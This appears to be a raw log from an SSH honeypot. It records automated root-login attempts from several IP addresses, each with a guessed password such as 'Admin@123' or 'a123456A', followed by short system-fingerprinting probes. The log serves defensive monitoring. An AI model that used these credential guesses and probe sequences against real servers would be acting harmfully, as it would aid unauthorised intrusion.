{"eventid":"cowrie.login.success","username":"root","password":"aB123456","message":"login attempt [root/aB123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:17:47.363124Z","src_ip":"217.154.1.158","session":"4fca86f5fae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:17:47.423851Z","src_ip":"217.154.1.158","session":"4fca86f5fae4"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T20:17:47.424578Z","src_ip":"217.154.1.158","session":"4fca86f5fae4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:17:47.439610Z","src_ip":"217.154.1.158","session":"4fca86f5fae4"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:17:47.440702Z","src_ip":"217.154.1.158","session":"4fca86f5fae4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36156,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa4e369a0b30","protocol":"ssh","message":"New connection: 212.227.125.160:36156 (1.2.3.4:22) [session: fa4e369a0b30]","sensor":"my-vps","timestamp":"2025-08-26T20:17:47.552564Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:17:47.553567Z","src_ip":"212.227.125.160","session":"fa4e369a0b30"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:17:47.576329Z","src_ip":"212.227.125.160","session":"fa4e369a0b30"}
{"eventid":"cowrie.login.success","username":"root","password":"cochonne","message":"login attempt [root/cochonne] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:17:47.651421Z","src_ip":"212.227.125.160","session":"fa4e369a0b30"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:17:47.778492Z","src_ip":"212.227.125.160","session":"fa4e369a0b30"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:17:47.779325Z","src_ip":"212.227.125.160","session":"fa4e369a0b30"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:17:47.803159Z","src_ip":"212.227.125.160","session":"fa4e369a0b30"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:17:47.804150Z","src_ip":"212.227.125.160","session":"fa4e369a0b30"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49582,"dst_ip":"1.2.3.4","dst_port":22,"session":"b40bf9ea3b87","protocol":"ssh","message":"New connection: 212.227.125.160:49582 (1.2.3.4:22) [session: b40bf9ea3b87]","sensor":"my-vps","timestamp":"2025-08-26T20:18:02.825841Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:18:02.901962Z","src_ip":"212.227.125.160","session":"b40bf9ea3b87"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:18:02.903188Z","src_ip":"212.227.125.160","session":"b40bf9ea3b87"}
{"eventid":"cowrie.login.success","username":"root","password":"bikette","message":"login attempt [root/bikette] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:18:03.342447Z","src_ip":"212.227.125.160","session":"b40bf9ea3b87"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:18:03.759789Z","src_ip":"212.227.125.160","session":"b40bf9ea3b87"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:18:03.760716Z","src_ip":"212.227.125.160","session":"b40bf9ea3b87"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:18:03.894588Z","src_ip":"212.227.125.160","session":"b40bf9ea3b87"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:18:03.896036Z","src_ip":"212.227.125.160","session":"b40bf9ea3b87"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":47060,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ae2294de1e9","protocol":"ssh","message":"New connection: 217.154.1.158:47060 (1.2.3.4:22) [session: 7ae2294de1e9]","sensor":"my-vps","timestamp":"2025-08-26T20:18:04.866111Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:18:04.867689Z","src_ip":"217.154.1.158","session":"7ae2294de1e9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:18:04.885709Z","src_ip":"217.154.1.158","session":"7ae2294de1e9"}
{"eventid":"cowrie.login.success","username":"root","password":"a123456A","message":"login attempt [root/a123456A] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:18:04.928294Z","src_ip":"217.154.1.158","session":"7ae2294de1e9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:18:04.974282Z","src_ip":"217.154.1.158","session":"7ae2294de1e9"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T20:18:04.974975Z","src_ip":"217.154.1.158","session":"7ae2294de1e9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:18:04.989469Z","src_ip":"217.154.1.158","session":"7ae2294de1e9"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:18:04.990614Z","src_ip":"217.154.1.158","session":"7ae2294de1e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48390,"dst_ip":"1.2.3.4","dst_port":22,"session":"712fa63e1e62","protocol":"ssh","message":"New connection: 212.227.125.160:48390 (1.2.3.4:22) [session: 712fa63e1e62]","sensor":"my-vps","timestamp":"2025-08-26T20:18:18.956681Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:18:18.957886Z","src_ip":"212.227.125.160","session":"712fa63e1e62"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:18:18.980662Z","src_ip":"212.227.125.160","session":"712fa63e1e62"}
{"eventid":"cowrie.login.success","username":"root","password":"aldrin1","message":"login attempt [root/aldrin1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:18:19.106124Z","src_ip":"212.227.125.160","session":"712fa63e1e62"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:18:19.233300Z","src_ip":"212.227.125.160","session":"712fa63e1e62"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:18:19.234025Z","src_ip":"212.227.125.160","session":"712fa63e1e62"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:18:19.260278Z","src_ip":"212.227.125.160","session":"712fa63e1e62"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:18:19.261323Z","src_ip":"212.227.125.160","session":"712fa63e1e62"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":43722,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5aed2f669a3","protocol":"ssh","message":"New connection: 217.154.1.158:43722 (1.2.3.4:22) [session: d5aed2f669a3]","sensor":"my-vps","timestamp":"2025-08-26T20:18:22.218766Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:18:22.219680Z","src_ip":"217.154.1.158","session":"d5aed2f669a3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:18:22.246358Z","src_ip":"217.154.1.158","session":"d5aed2f669a3"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@123","message":"login attempt [root/Admin@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:18:22.293515Z","src_ip":"217.154.1.158","session":"d5aed2f669a3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:18:22.340313Z","src_ip":"217.154.1.158","session":"d5aed2f669a3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T20:18:22.340986Z","src_ip":"217.154.1.158","session":"d5aed2f669a3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:18:22.356457Z","src_ip":"217.154.1.158","session":"d5aed2f669a3"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:18:22.357430Z","src_ip":"217.154.1.158","session":"d5aed2f669a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48392,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5b3e1772271","protocol":"ssh","message":"New connection: 212.227.125.160:48392 (1.2.3.4:22) [session: c5b3e1772271]","sensor":"my-vps","timestamp":"2025-08-26T20:18:26.487684Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:18:26.488856Z","src_ip":"212.227.125.160","session":"c5b3e1772271"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:18:26.519578Z","src_ip":"212.227.125.160","session":"c5b3e1772271"}
{"eventid":"cowrie.login.success","username":"root","password":"CAROLINE","message":"login attempt [root/CAROLINE] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:18:26.592556Z","src_ip":"212.227.125.160","session":"c5b3e1772271"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:18:26.720416Z","src_ip":"212.227.125.160","session":"c5b3e1772271"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:18:26.721139Z","src_ip":"212.227.125.160","session":"c5b3e1772271"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:18:26.746236Z","src_ip":"212.227.125.160","session":"c5b3e1772271"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:18:26.747343Z","src_ip":"212.227.125.160","session":"c5b3e1772271"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48406,"dst_ip":"1.2.3.4","dst_port":22,"session":"034b206a0b01","protocol":"ssh","message":"New connection: 212.227.125.160:48406 (1.2.3.4:22) [session: 034b206a0b01]","sensor":"my-vps","timestamp":"2025-08-26T20:18:28.854190Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:18:28.857121Z","src_ip":"212.227.125.160","session":"034b206a0b01"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:18:28.878908Z","src_ip":"212.227.125.160","session":"034b206a0b01"}
{"eventid":"cowrie.login.success","username":"root","password":"7418521","message":"login attempt [root/7418521] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:18:28.972781Z","src_ip":"212.227.125.160","session":"034b206a0b01"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:18:29.083325Z","src_ip":"212.227.125.160","session":"034b206a0b01"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:18:29.084080Z","src_ip":"212.227.125.160","session":"034b206a0b01"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:18:29.107545Z","src_ip":"212.227.125.160","session":"034b206a0b01"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:18:29.108527Z","src_ip":"212.227.125.160","session":"034b206a0b01"}
{"eventid":"cowrie.session.connect","src_ip":"213.108.243.7","src_port":23603,"dst_ip":"1.2.3.4","dst_port":22,"session":"997202142127","protocol":"ssh","message":"New connection: 213.108.243.7:23603 (1.2.3.4:22) [session: 997202142127]","sensor":"my-vps","timestamp":"2025-08-26T20:18:39.470187Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:18:39.471204Z","src_ip":"213.108.243.7","session":"997202142127"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-c